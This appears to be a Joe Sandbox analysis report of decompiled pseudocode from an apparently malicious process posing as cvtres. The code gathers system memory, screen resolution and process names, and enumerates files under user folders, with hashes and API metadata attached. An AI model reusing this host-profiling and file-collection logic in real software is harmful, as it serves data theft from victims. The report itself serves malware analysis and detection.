                                                                    				signed int _t32;
                                                                    
                                                                    				_t31 = __esi;
                                                                    				_t24 = __ebx;
                                                                    				_t12 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t12 ^ _t32;
                                                                    				_t30 = HeapAlloc(GetProcessHeap(), 0, 0x104);
                                                                    				E00426300( &_v76, 0, 0x40);
                                                                    				_t18 =  &_v76;
                                                                    				_v76 = 0x40;
                                                                    				GlobalMemoryStatusEx(_t18);
                                                                    				if(_t18 != 1) {
                                                                    					_t25 = 0;
                                                                    					_t19 = 0;
                                                                    				} else {
                                                                    					_t23 = _v64;
                                                                    					_t25 = (_t23 << 0x00000020 | _v68) >> 0x14;
                                                                    					_t19 = _t23 >> 0x14;
                                                                    				}
                                                                    				wsprintfA(_t30, "%d MB", _t25);
                                                                    				return E0041DA9B(_t30, _t24, _v8 ^ _t32, _t29, _t30, _t31, _t19);
                                                                    			}


















                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,0043C8DC), ref: 004151C2
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004151C9
                                                                    • _memset.LIBCMT ref: 004151D9
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 004151EC
                                                                    • wsprintfA.USER32 ref: 00415212
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatus_memsetwsprintf
                                                                    • String ID: %d MB$@
                                                                    • API String ID: 3402858368-3474575989
                                                                    • Opcode ID: 089cfbfaf65fa7301573113a26009e7c866ebd4282e7d568f5f166b1e6f6bbb9
                                                                    • Instruction ID: 71902aa2354f955e535f1807a7470d30660cfcb32d5b128367d9949f688c8c48
                                                                    • Opcode Fuzzy Hash: 089cfbfaf65fa7301573113a26009e7c866ebd4282e7d568f5f166b1e6f6bbb9
                                                                    • Instruction Fuzzy Hash: 0901D6B5B00108ABDB04DFB4DC4AFAE77B8EB46704F55003AFA02E2281DA74D805875D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E00410CC2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t115;
                                                                    				char* _t117;
                                                                    				char* _t118;
                                                                    				intOrPtr _t136;
                                                                    				intOrPtr _t140;
                                                                    				intOrPtr _t142;
                                                                    				void* _t152;
                                                                    				void* _t154;
                                                                    				void* _t156;
                                                                    				void* _t159;
                                                                    				intOrPtr* _t161;
                                                                    				void* _t182;
                                                                    				void* _t184;
                                                                    				void* _t186;
                                                                    				void* _t189;
                                                                    				intOrPtr* _t191;
                                                                    				intOrPtr _t204;
                                                                    				intOrPtr _t206;
                                                                    				void* _t209;
                                                                    				char* _t212;
                                                                    				char* _t213;
                                                                    				intOrPtr _t214;
                                                                    				void* _t240;
                                                                    				void* _t259;
                                                                    				void* _t260;
                                                                    				char* _t261;
                                                                    				char* _t262;
                                                                    
                                                                    				_t241 = __edi;
                                                                    				_push(0x970);
                                                                    				E0042083E(E004348F8, __ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t259 - 0x96c)) =  *((intOrPtr*)(_t259 + 8));
                                                                    				_t115 = E00416617(__ebx, __edi, __esi, 0x1a);
                                                                    				_t250 = 0xf;
                                                                    				 *((intOrPtr*)(_t259 - 0x7ec)) = _t250;
                                                                    				 *((intOrPtr*)(_t259 - 0x7f0)) = 0;
                                                                    				 *((char*)(_t259 - 0x800)) = 0;
                                                                    				E00404331(_t259 - 0x800, _t115);
                                                                    				_t209 = 0x3e8;
                                                                    				 *((intOrPtr*)(_t259 - 4)) = 0;
                                                                    				_t240 = 0x3e8;
                                                                    				_t117 = _t259 - 0x7e4;
                                                                    				do {
                                                                    					 *_t117 = 0;
                                                                    					_t117 = _t117 + 1;
                                                                    					_t240 = _t240 - 1;
                                                                    				} while (_t240 != 0);
                                                                    				_t118 = _t259 - 0x3fc;
                                                                    				do {
                                                                    					 *_t118 = 0;
                                                                    					_t118 = _t118 + 1;
                                                                    					_t209 = _t209 - 1;
                                                                    					_t266 = _t209;
                                                                    				} while (_t209 != 0);
                                                                    				lstrcatA(_t259 - 0x7e4, E00416617(0, __edi, _t250, 0x1a));
                                                                    				lstrcatA(_t259 - 0x7e4,  *0x445ddc);
                                                                    				lstrcatA(_t259 - 0x7e4,  *0x445b0c);
                                                                    				lstrcatA(_t259 - 0x3fc, E00416617(0, __edi, _t250, 0x1a));
                                                                    				lstrcatA(_t259 - 0x3fc,  *0x445f58);
                                                                    				lstrcatA(_t259 - 0x3fc, "*");
                                                                    				_t261 = _t260 - 0x1c;
                                                                    				_t212 = _t261;
                                                                    				 *((intOrPtr*)(_t259 - 0x968)) = _t261;
                                                                    				 *((intOrPtr*)(_t212 + 0x14)) = _t250;
                                                                    				 *((intOrPtr*)(_t212 + 0x10)) = 0;
                                                                    				 *_t212 = 0;
                                                                    				E00404331(_t212, _t259 - 0x7e4);
                                                                    				E004162AB(_t259 - 0x964, _t241, _t250, _t266);
                                                                    				 *((char*)(_t259 - 4)) = 1;
                                                                    				_t136 =  *((intOrPtr*)(_t259 - 0x960));
                                                                    				_t204 =  *((intOrPtr*)(_t259 - 0x964));
                                                                    				 *((intOrPtr*)(_t259 - 0x954)) = _t136;
                                                                    				_t267 = _t204 - _t136;
                                                                    				if(_t204 != _t136) {
                                                                    					do {
                                                                    						E0040D38B(_t259 - 0x81c, _t204);
                                                                    						 *((char*)(_t259 - 4)) = 2;
                                                                    						_t182 = E0041607C(_t259 - 0x81c, _t240, _t259 - 0x870);
                                                                    						 *((char*)(_t259 - 4)) = 3;
                                                                    						_push( *0x445ddc);
                                                                    						_push(_t259 - 0x8a8);
                                                                    						_t184 = E0040C233(_t204, _t259 - 0x800, _t182, _t267);
                                                                    						 *((char*)(_t259 - 4)) = 4;
                                                                    						_t186 = E004046CE(_t182, _t259 - 0x8e0);
                                                                    						 *((char*)(_t259 - 4)) = 5;
                                                                    						_t189 = E0041607C(_t259 - 0x81c, _t240, _t259 - 0x854);
                                                                    						 *((char*)(_t259 - 4)) = 6;
                                                                    						_t191 = E00404697(_t184, _t259 - 0x8c4,  *0x445c60, _t189);
                                                                    						_t261 = _t261 + 0xc;
                                                                    						 *((char*)(_t259 - 4)) = 7;
                                                                    						if( *((intOrPtr*)(_t186 + 0x14)) < 0x10) {
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t191 + 0x14)) >= 0x10) {
                                                                    							_t191 =  *_t191;
                                                                    						}
                                                                    						E0041CEAD(_t191);
                                                                    						E00404354(_t259 - 0x8c4, 1, 0);
                                                                    						E00404354(_t259 - 0x854, 1, 0);
                                                                    						E00404354(_t259 - 0x8e0, 1, 0);
                                                                    						E00404354(_t259 - 0x8a8, 1, 0);
                                                                    						E00404354(_t259 - 0x870, 1, 0);
                                                                    						_t241 = 0;
                                                                    						 *((char*)(_t259 - 4)) = 1;
                                                                    						E0040C148(0, _t259 - 0x81c, 1);
                                                                    						_t204 = _t204 + 0x1c;
                                                                    						_t270 = _t204 -  *((intOrPtr*)(_t259 - 0x954));
                                                                    					} while (_t204 !=  *((intOrPtr*)(_t259 - 0x954)));
                                                                    					_t250 = 0xf;
                                                                    				}
                                                                    				_t262 = _t261 - 0x1c;
                                                                    				_t213 = _t262;
                                                                    				 *(_t213 + 0x10) =  *(_t213 + 0x10) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t259 - 0x968)) = _t262;
                                                                    				 *((intOrPtr*)(_t213 + 0x14)) = _t250;
                                                                    				 *_t213 = 0;
                                                                    				E00404331(_t213, _t259 - 0x3fc);
                                                                    				_t242 = E004162AB(_t259 - 0x97c, _t241, _t250, _t270);
                                                                    				_t140 = _t259 - 0x964;
                                                                    				if(_t140 == _t242) {
                                                                    					_t206 = 0;
                                                                    					__eflags = 0;
                                                                    				} else {
                                                                    					_t250 = _t140;
                                                                    					E0040D44B(_t140);
                                                                    					 *((intOrPtr*)(_t259 - 0x964)) =  *_t242;
                                                                    					 *((intOrPtr*)(_t259 - 0x960)) =  *((intOrPtr*)(_t242 + 4));
                                                                    					_t206 = 0;
                                                                    					 *((intOrPtr*)(_t259 - 0x95c)) =  *((intOrPtr*)(_t242 + 8));
                                                                    					 *_t242 = 0;
                                                                    					 *((intOrPtr*)(_t242 + 4)) = 0;
                                                                    					 *((intOrPtr*)(_t242 + 8)) = 0;
                                                                    				}
                                                                    				 *((char*)(_t259 - 4)) = 1;
                                                                    				_t141 =  *((intOrPtr*)(_t259 - 0x97c));
                                                                    				if( *((intOrPtr*)(_t259 - 0x97c)) != _t206) {
                                                                    					E0040D51F(_t141,  *((intOrPtr*)(_t259 - 0x978)));
                                                                    					_push( *((intOrPtr*)(_t259 - 0x97c)));
                                                                    					E0041E1F1();
                                                                    				}
                                                                    				_t142 =  *((intOrPtr*)(_t259 - 0x960));
                                                                    				_t214 =  *((intOrPtr*)(_t259 - 0x964));
                                                                    				 *((intOrPtr*)(_t259 - 0x968)) = _t142;
                                                                    				 *((intOrPtr*)(_t259 - 0x954)) = _t214;
                                                                    				_t273 = _t214 - _t142;
                                                                    				if(_t214 != _t142) {
                                                                    					do {
                                                                    						E0040D38B(_t259 - 0x838,  *((intOrPtr*)(_t259 - 0x954)));
                                                                    						 *((char*)(_t259 - 4)) = 9;
                                                                    						_t152 = E0041607C(_t259 - 0x838, _t240, _t259 - 0x934);
                                                                    						 *((char*)(_t259 - 4)) = 0xa;
                                                                    						_push( *0x445f58);
                                                                    						_push(_t259 - 0x8fc);
                                                                    						_t154 = E0040C233(_t206, _t259 - 0x800, _t152, _t273);
                                                                    						 *((char*)(_t259 - 4)) = 0xb;
                                                                    						_t156 = E004046CE(_t152, _t259 - 0x950);
                                                                    						 *((char*)(_t259 - 4)) = 0xc;
                                                                    						_t159 = E0041607C(_t259 - 0x838, _t240, _t259 - 0x918);
                                                                    						 *((char*)(_t259 - 4)) = 0xd;
                                                                    						_t161 = E00404697(_t154, _t259 - 0x88c,  *0x445cc4, _t159);
                                                                    						_t262 = _t262 + 0xc;
                                                                    						 *((char*)(_t259 - 4)) = 0xe;
                                                                    						if( *((intOrPtr*)(_t156 + 0x14)) < 0x10) {
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t161 + 0x14)) >= 0x10) {
                                                                    							_t161 =  *_t161;
                                                                    						}
                                                                    						E0041CEAD(_t161);
                                                                    						E00404354(_t259 - 0x88c, 1, _t206);
                                                                    						E00404354(_t259 - 0x918, 1, _t206);
                                                                    						E00404354(_t259 - 0x950, 1, _t206);
                                                                    						E00404354(_t259 - 0x8fc, 1, _t206);
                                                                    						E00404354(_t259 - 0x934, 1, _t206);
                                                                    						_t242 = 0;
                                                                    						_t250 = _t259 - 0x838;
                                                                    						 *((char*)(_t259 - 4)) = 1;
                                                                    						E0040C148(0, _t259 - 0x838, 1);
                                                                    						 *((intOrPtr*)(_t259 - 0x954)) =  *((intOrPtr*)(_t259 - 0x954)) + 0x1c;
                                                                    					} while ( *((intOrPtr*)(_t259 - 0x954)) !=  *((intOrPtr*)(_t259 - 0x968)));
                                                                    				}
                                                                    				_t143 =  *((intOrPtr*)(_t259 - 0x964));
                                                                    				if( *((intOrPtr*)(_t259 - 0x964)) != _t206) {
                                                                    					E0040D51F(_t143,  *((intOrPtr*)(_t259 - 0x960)));
                                                                    					_push( *((intOrPtr*)(_t259 - 0x964)));
                                                                    					E0041E1F1();
                                                                    				}
                                                                    				 *((intOrPtr*)(_t259 - 0x964)) = _t206;
                                                                    				 *((intOrPtr*)(_t259 - 0x960)) = _t206;
                                                                    				 *((intOrPtr*)(_t259 - 0x95c)) = _t206;
                                                                    				E00404354(_t259 - 0x800, 1, _t206);
                                                                    				return E00420888(_t206, _t242, _t250);
                                                                    			}































                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00410CCC
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                    • lstrcatA.KERNEL32(?,00000000,00000000,00000970,0041359F,?,?,?,?,?,?,?,?,?,?,?), ref: 00410D37
                                                                    • lstrcatA.KERNEL32(?), ref: 00410D4A
                                                                    • lstrcatA.KERNEL32(?), ref: 00410D5D
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00410D73
                                                                    • lstrcatA.KERNEL32(?), ref: 00410D86
                                                                    • lstrcatA.KERNEL32(?,0043EE4C), ref: 00410D98
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                      • Part of subcall function 0040C148: _memmove.LIBCMT ref: 0040C162
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memmove$FolderH_prolog3_Path_memset
                                                                    • String ID:
                                                                    • API String ID: 3670317503-0
                                                                    • Opcode ID: 24d7d41e8632c0084af0d35026e7b117cd4c615a86271df0a8c9d1665c220cab
                                                                    • Instruction ID: 0f7f5597d831c79fc4751f38d1cfc365ae307ced7288515f4b0a7b3771bf9554
                                                                    • Opcode Fuzzy Hash: 24d7d41e8632c0084af0d35026e7b117cd4c615a86271df0a8c9d1665c220cab
                                                                    • Instruction Fuzzy Hash: D2C190719012689FDB21EB65CC80BDDBBB8AF49304F1040EAE509A7192DA355FC8CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E00415442(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t27;
                                                                    				void* _t29;
                                                                    				struct HDC__* _t41;
                                                                    				void* _t52;
                                                                    				void* _t54;
                                                                    				void* _t57;
                                                                    				void* _t61;
                                                                    
                                                                    				_t61 = __eflags;
                                                                    				_t52 = __edx;
                                                                    				_push(0x7c);
                                                                    				E0042083E(E0043472A, __ebx, __edi, __esi);
                                                                    				_t54 = __ecx;
                                                                    				 *((intOrPtr*)(_t57 - 0x88)) = 0;
                                                                    				_t41 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                    				 *((intOrPtr*)(_t57 - 0x88)) = GetDeviceCaps(_t41, 8);
                                                                    				 *((intOrPtr*)(_t57 - 0x84)) = GetDeviceCaps(_t41, 0xa);
                                                                    				ReleaseDC(0, _t41);
                                                                    				_push( *((intOrPtr*)(_t57 - 0x84)));
                                                                    				 *((intOrPtr*)(_t57 - 0x84)) = E00415F45(_t41, _t57 - 0x80, _t52, _t54, 0, _t61);
                                                                    				_push( *((intOrPtr*)(_t57 - 0x88)));
                                                                    				_t46 = _t57 - 0x64;
                                                                    				 *((intOrPtr*)(_t57 - 4)) = 0;
                                                                    				_t27 = E00415F45(_t41, _t57 - 0x64, _t52, _t54, 0, _t61);
                                                                    				 *((char*)(_t57 - 4)) = 1;
                                                                    				_t29 = E00404697(_t57 - 0x64, _t57 - 0x48, 0x43c8d8, _t27);
                                                                    				 *((char*)(_t57 - 4)) = 2;
                                                                    				E0040C20F(_t46, _t57 - 0x2c, _t29, "x");
                                                                    				 *((char*)(_t57 - 4)) = 3;
                                                                    				E004046CE( *((intOrPtr*)(_t57 - 0x84)), _t54);
                                                                    				E00404354(_t57 - 0x2c, 1, 0);
                                                                    				E00404354(_t57 - 0x48, 1, 0);
                                                                    				E00404354(_t57 - 0x64, 1, 0);
                                                                    				E00404354(_t57 - 0x80, 1, 0);
                                                                    				return E00420888(1, _t54, 0);
                                                                    			}











                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00415449
                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415460
                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0041546B
                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041547A
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00415488
                                                                      • Part of subcall function 00415F45: __EH_prolog3_GS.LIBCMT ref: 00415F4F
                                                                      • Part of subcall function 00415F45: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416052
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CapsDeviceH_prolog3_$CreateIos_base_dtorRelease_memmovestd::ios_base::_
                                                                    • String ID: DISPLAY
                                                                    • API String ID: 350445702-865373369
                                                                    • Opcode ID: 0e178147caafaac4e9b6ea204f87d0f2ae11ecc16876635c896d9428c979760a
                                                                    • Instruction ID: 210d82f3644b0323bf1a3b3590f00a491fe0f4a48142152e6f432a25fd100599
                                                                    • Opcode Fuzzy Hash: 0e178147caafaac4e9b6ea204f87d0f2ae11ecc16876635c896d9428c979760a
                                                                    • Instruction Fuzzy Hash: 682186B1D01118ABCB10EBA5CC89FDE7F78BF15344F14406AF509B2191EE380A49CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00416420
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,00000000), ref: 00416432
                                                                    • EnumProcessModules.PSAPI(00000000,?,00000004,?,?,00000000,00000000), ref: 00416449
                                                                    • GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,00000000,00000000), ref: 00416460
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00416467
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen_memset
                                                                    • String ID: <unknown>
                                                                    • API String ID: 601403599-1574992787
                                                                    • Opcode ID: ad1c87eeea8f6fa882f62f820d7b2cfb2fa607c7812577ba7cd2e72bbbb9155b
                                                                    • Instruction ID: f7858d53e1e8637c8a522bdb343f00f4add88303db9b965dbc866339f1100c32
                                                                    • Opcode Fuzzy Hash: ad1c87eeea8f6fa882f62f820d7b2cfb2fa607c7812577ba7cd2e72bbbb9155b
                                                                    • Instruction Fuzzy Hash: 52117272900618AFEB31DFA5DC45BDEB7B8BF09705F014029F914EB181D77496488F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 64%
                                                                    			E004208BF(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                    				void* _t9;
                                                                    				char* _t11;
                                                                    				char* _t12;
                                                                    				void* _t16;
                                                                    				signed int _t17;
                                                                    				void* _t29;
                                                                    				char* _t30;
                                                                    				void* _t31;
                                                                    
                                                                    				_push(__ebx);
                                                                    				_t29 = E00425E8C(__ebx);
                                                                    				if(_t29 != 0) {
                                                                    					if( *(_t29 + 0x24) != 0) {
                                                                    						L7:
                                                                    						_t30 =  *(_t29 + 0x24);
                                                                    						if(E0041E192(_t30, 0x86, E00420897(_a4)) != 0) {
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_t9 = E004239B9();
                                                                    							asm("int3");
                                                                    							_push(_t30);
                                                                    							_t31 = _t16;
                                                                    							if(_t31 != 0 && _t9 != 0 && _t9 != _t31) {
                                                                    								_push(0x86);
                                                                    								_t17 = 0x36;
                                                                    								 *(memcpy(_t9, _t31, _t17 << 2)) =  *_t10 & 0x00000000;
                                                                    								_t9 = E00425A1C(_t10);
                                                                    							}
                                                                    							return _t9;
                                                                    						} else {
                                                                    							_t11 = _t30;
                                                                    							goto L5;
                                                                    						}
                                                                    					} else {
                                                                    						_t12 = E00422019(0x86, 1);
                                                                    						_pop(_t16);
                                                                    						 *(_t29 + 0x24) = _t12;
                                                                    						if(_t12 != 0) {
                                                                    							goto L7;
                                                                    						} else {
                                                                    							_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                    							L5:
                                                                    							goto L6;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                    					L6:
                                                                    					return _t11;
                                                                    				}
                                                                    			}












                                                                    APIs
                                                                    • __getptd_noexit.LIBCMT ref: 004208C6
                                                                      • Part of subcall function 00425E8C: GetLastError.KERNEL32(?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 00425E90
                                                                      • Part of subcall function 00425E8C: ___set_flsgetvalue.LIBCMT ref: 00425E9E
                                                                      • Part of subcall function 00425E8C: __calloc_crt.LIBCMT ref: 00425EB2
                                                                      • Part of subcall function 00425E8C: DecodePointer.KERNEL32(00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 00425ECC
                                                                      • Part of subcall function 00425E8C: GetCurrentThreadId.KERNEL32 ref: 00425EE2
                                                                      • Part of subcall function 00425E8C: SetLastError.KERNEL32(00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 00425EFA
                                                                    • __calloc_crt.LIBCMT ref: 004208E8
                                                                    • __get_sys_err_msg.LIBCMT ref: 00420906
                                                                    • _strcpy_s.LIBCMT ref: 0042090E
                                                                    • __invoke_watson.LIBCMT ref: 00420923
                                                                    Strings
                                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004208D3, 004208F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                    • API String ID: 3117964792-798102604
                                                                    • Opcode ID: 1505c339cb015a9e1f4c8a70d905c504d02cc1fbbfa8d0de9dd9cb042d3b4ef2
                                                                    • Instruction ID: 85bafaffa843aaadd39f1fceae3c1a10cccce632f0278155b863be3590c65fc0
                                                                    • Opcode Fuzzy Hash: 1505c339cb015a9e1f4c8a70d905c504d02cc1fbbfa8d0de9dd9cb042d3b4ef2
                                                                    • Instruction Fuzzy Hash: 83F02B727002342BD720392A7C4196B75DDCB84718F90043FFA4A97203E9BD9C8142DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E00425DD8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t26;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr _t39;
                                                                    				void* _t40;
                                                                    
                                                                    				_t31 = __ebx;
                                                                    				_push(8);
                                                                    				_push(0x440918);
                                                                    				E00427300(__ebx, __edi, __esi);
                                                                    				GetModuleHandleW(L"KERNEL32.DLL");
                                                                    				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                    				 *((intOrPtr*)(_t39 + 0x5c)) = 0x436c40;
                                                                    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                                                    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                                                    				 *((char*)(_t39 + 0xc8)) = 0x43;
                                                                    				 *((char*)(_t39 + 0x14b)) = 0x43;
                                                                    				 *(_t39 + 0x68) = 0x443690;
                                                                    				E004279D9(__ebx, 1, 0xd);
                                                                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                    				InterlockedIncrement( *(_t39 + 0x68));
                                                                    				 *(_t40 - 4) = 0xfffffffe;
                                                                    				E00425E7A();
                                                                    				E004279D9(_t31, 1, 0xc);
                                                                    				 *(_t40 - 4) = 1;
                                                                    				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                                                    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                                                    				if(_t26 == 0) {
                                                                    					_t30 =  *0x443df8; // 0x4be11a0
                                                                    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                                                    				}
                                                                    				E00425A1C( *((intOrPtr*)(_t39 + 0x6c)));
                                                                    				 *(_t40 - 4) = 0xfffffffe;
                                                                    				return E00427345(E00425E83());
                                                                    			}








                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00440918,00000008,00425EE0,00000000,00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 00425DE9
                                                                    • __lock.LIBCMT ref: 00425E1D
                                                                      • Part of subcall function 004279D9: __mtinitlocknum.LIBCMT ref: 004279EF
                                                                      • Part of subcall function 004279D9: __amsg_exit.LIBCMT ref: 004279FB
                                                                      • Part of subcall function 004279D9: EnterCriticalSection.KERNEL32(?,?,?,00425E22,0000000D), ref: 00427A03
                                                                    • InterlockedIncrement.KERNEL32(00443690), ref: 00425E2A
                                                                    • __lock.LIBCMT ref: 00425E3E
                                                                    • ___addlocaleref.LIBCMT ref: 00425E5C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                    • String ID: KERNEL32.DLL
                                                                    • API String ID: 637971194-2576044830
                                                                    • Opcode ID: 2ecb6dcd75beeb6c8019aac2673cdf63fa8f73a530f68e8ec91cebba44c3e175
                                                                    • Instruction ID: e38cc65030100f2965e51e0687373edec994876024335d1bd1145aee33e093fc
                                                                    • Opcode Fuzzy Hash: 2ecb6dcd75beeb6c8019aac2673cdf63fa8f73a530f68e8ec91cebba44c3e175
                                                                    • Instruction Fuzzy Hash: DF01A571A04B11EFE720EF76E805309F7E0AF14325F10850FE896972A0CBB8A640DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E0040DF59(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t37;
                                                                    				void* _t38;
                                                                    
                                                                    				_t35 = __edi;
                                                                    				_push(0xc);
                                                                    				E004207D5(E00433849, __ebx, __edi, __esi);
                                                                    				_t37 =  *((intOrPtr*)(_t38 + 8));
                                                                    				E0041D5BD(_t37, 0);
                                                                    				 *((intOrPtr*)(_t38 - 4)) = 0;
                                                                    				 *((intOrPtr*)(_t37 + 4)) = 0;
                                                                    				 *((char*)(_t37 + 8)) = 0;
                                                                    				 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                                    				 *((char*)(_t37 + 0x10)) = 0;
                                                                    				 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                                                    				 *((char*)(_t37 + 0x18)) = 0;
                                                                    				 *((intOrPtr*)(_t37 + 0x1c)) = 0;
                                                                    				 *((char*)(_t37 + 0x20)) = 0;
                                                                    				 *((char*)(_t38 - 4)) = 4;
                                                                    				_t40 =  *(_t38 + 0xc);
                                                                    				if( *(_t38 + 0xc) == 0) {
                                                                    					 *(_t38 + 0xc) = "bad locale name";
                                                                    					E0041DC00(_t38 - 0x18, _t38 + 0xc);
                                                                    					 *((intOrPtr*)(_t38 - 0x18)) = 0x435218;
                                                                    					E0041FF86(_t38 - 0x18, 0x440c68);
                                                                    				}
                                                                    				E0041D3E4(0, _t35, _t37, _t40, _t37,  *(_t38 + 0xc));
                                                                    				return E00420874(_t37);
                                                                    			}






                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0040DF60
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DF6D
                                                                    • std::exception::exception.LIBCMT ref: 0040DFA4
                                                                      • Part of subcall function 0041DC00: std::exception::_Copy_str.LIBCMT ref: 0041DC1B
                                                                    • __CxxThrowException@8.LIBCMT ref: 0040DFB9
                                                                      • Part of subcall function 0041FF86: RaiseException.KERNEL32(?,0040475E,^G@,?,?,?,?,?,0040475E,?,00440C30,00000000), ref: 0041FFC8
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_$Copy_strExceptionException@8H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                                    • String ID: bad locale name
                                                                    • API String ID: 637683493-1405518554
